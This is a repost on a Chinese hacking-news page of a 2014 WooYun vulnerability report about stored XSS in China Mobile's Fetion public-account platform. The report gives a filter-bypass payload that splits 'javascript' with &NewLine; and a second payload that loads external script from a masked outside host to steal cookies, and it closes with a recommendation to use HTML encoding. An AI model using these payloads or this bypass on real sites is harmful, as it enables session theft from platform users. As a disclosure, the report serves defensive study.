记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国移动飞信公众平台存储型XSS漏洞(指谁打谁)

2014-12-01 11:45

其实某运营商就是移动,公众平台就是飞信公众平台。



每个飞信用户都可以申请一个公众帐号,跟微信公众平台一样可以给关注者发送信息,关注者也可以 跟公众帐号发信息。





利用过程:

在飞信客户端,用个人帐号A给公众帐号B发消息:

code 区域
<a href="javasc&NewLine;ript:alert(/xss/)" >点击查看详情</a>



fx1.png



(<script>alert(/xss/)是个人帐号A的昵称,eval(name)是公众帐号B的昵称,这只是之前为了测试用的,在这里没有意义)

然后,进入公众飞信平台 http://gz.feixin.10086.cn/ ,使用公众帐号B登录后,打开URL:

http://gz.feixin.10086.cn/Platform/Index/message

在我的消息页面,鼠标点击“点击查看详情”时会出现弹窗,

fx2.png



代码显示是这样的:

fx3.png



漏洞证明:

至于利用代码为什么为 javasc&NewLine;ript:alert(/xss/),是因为该系统已经对代码进行了过滤,在<script>和javascript等字符串中间会加上<x>,即变成<scr<x>ipt>和java<x>script,但是这里把javascript中间插入换行符(即&NewLine;或者&#09;等等)就可以绕过了。





上面只是个漏洞证明,经过测试,没有对输入数据进行长度限制,也可以通过导入外部js,盗取cookie等,

code 区域
<a href="javasc&NewLine;ript:jQuery.getScript('//xss.**/****')" >点击查看详情</a>



fx4.png



除了盗取Cookie之外还可能造成其他危害,不再详述。



不过这里需要通过点击才能触发,需要一定的触发条件,需配合钓鱼。

能力有限,暂时未能写出能够直接触发的代码,求大牛指导。

修复方案:

虽然已经对输入数据进行一定的处理,但是建议不要使用黑名单过滤,最好直接进行html编码等方式。

知识来源: www.wooyun.org/bugs/wooyun-2014-079692

阅读:71156 | 评论:0 | 标签:xss 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“中国移动飞信公众平台存储型XSS漏洞(指谁打谁)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词